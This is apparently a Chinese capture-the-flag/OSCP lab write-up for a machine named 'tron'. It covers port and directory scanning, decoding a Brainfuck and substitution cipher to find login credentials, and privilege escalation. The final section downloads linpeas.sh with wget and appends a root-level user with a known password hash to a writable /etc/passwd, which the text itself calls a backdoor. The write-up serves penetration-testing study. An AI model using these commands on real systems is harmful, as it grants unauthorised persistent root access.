【OSCP】tron

OSCP 靶场

靶场介绍

信息收集

主机发现

nmap -sn 192.168.1.0/24

端口扫描

└─# nmap -sV -A -p- -T4 192.168.1.212       
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-28 21:21 EST
Nmap scan report for 192.168.1.212
Host is up (0.00094s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1f:ed:64:93:84:b5:b2:e8:af:5a:0e:6f:52:af:4b:48 (RSA)
|   256 3d:df:6f:02:13:9e:15:f8:51:94:30:f8:45:e3:f2:93 (ECDSA)
|_  256 2f:f4:af:e1:f4:c4:a5:3b:50:bb:e5:b9:2a:9f:39:de (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Master Control Program
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:00:D6:3B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.94 ms 192.168.1.212

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.212 -x php,txt,html -e

=====================================================
http://192.168.1.212/.html                (Status: 403) [Size: 278]
http://192.168.1.212/index.html           (Status: 200) [Size: 309]
http://192.168.1.212/img                  (Status: 301) [Size: 312] [--> http://192.168.1.212/img/]
http://192.168.1.212/manual               (Status: 301) [Size: 315] [--> http://192.168.1.212/manual/]
http://192.168.1.212/robots.txt           (Status: 200) [Size: 623]
http://192.168.1.212/font                 (Status: 301) [Size: 313] [--> http://192.168.1.212/font/]
http://192.168.1.212/.html                (Status: 403) [Size: 278]
http://192.168.1.212/MCP                  (Status: 301) [Size: 312] [--> http://192.168.1.212/MCP/]
http://192.168.1.212/server-status        (Status: 403) [Size: 278]

首页html源码有一对类似账号密码的

这里有一个substitute密码暂时不知道是什么用处，先放着

substitute
--------------------------
plaintext
abcdefghijklmnopqrstuvwxyz

ciphertext
zyxwvutsrqponmlkjihgfedcba
--------------------------

这里发现一串base64编码，解码后是一串Brainfuck代码

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++++.----.-----------.++++++++++++++++++++++++.--------------------.+++++++++++++.

Brainfuck 是一种极简主义的编程语言，由 Urban Müller 在 1993 年创建。它被设计成极其紧凑，只包含八种简单的指令。Brainfuck 的目标是通过极简的语法展示图灵完备性，即能够表达任何可以通过图灵机实现的计算。

Brainfuck 的指令集包括：

1. >：将指针指向当前内存单元的下一个单元。

2. <：将指针指向当前内存单元的上一个单元。

3. +：将当前内存单元的值加一。

4. -：将当前内存单元的值减一。

5. [：如果当前内存单元的值为零，则跳转到对应的 ] 否则继续执行下一条指令。

6. ]：如果当前内存单元的值不为零，则跳转到对应的 [ 否则继续执行下一条指令。

7. .：输出当前内存单元的 ASCII 值对应的字符。

8. ,：从输入中读取一个字符，存储到当前内存单元。

Brainfuck 的代码看起来晦涩难懂，但由于其极简的特性，它适用于一些编程挑战和谜题。虽然不常用于实际编程任务，但它在计算机科学教育和编程语言理论中有一定的影响。

解码后是player

http://www.hiencode.com/brain.html
https://ctfever.uniiem.com/tools/brain-fuck

这里结合上面所发现的信息对一开始发现的密码进行解密，获得一个密码

权限获取

使用上面加密的账号密码成功获取权限

权限提升

使用linpeas脚本发现passwd 有写入权限，那么我们可以直接写入一个root权限的用户或者更改他的账号密码

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

passwd写入

1、kali 生成密码
perl -e 'print crypt("123456", "AA"). "n"'
AASwmzPNx.3sg //密码：123456 ，AA 为盐
或者
生成密码： openssl passwd -1 -salt admin 123456 
-1 的意思是使用md5crypt加密算法 
-salt 指定盐为admin 
123456 明文密码
2、生成后构造passwd文件中的条目
mysqld:AASwmzPNx.3sg:0:0:me:/root:/bin/bash
3、在被控制机器上添加后门
echo "mysqld:AASwmzPNx.3sg:0:0:me:/root:/bin/bash" >> /etc/passwd

原文始发于微信公众号（贝雷帽SEC）：【OSCP】tron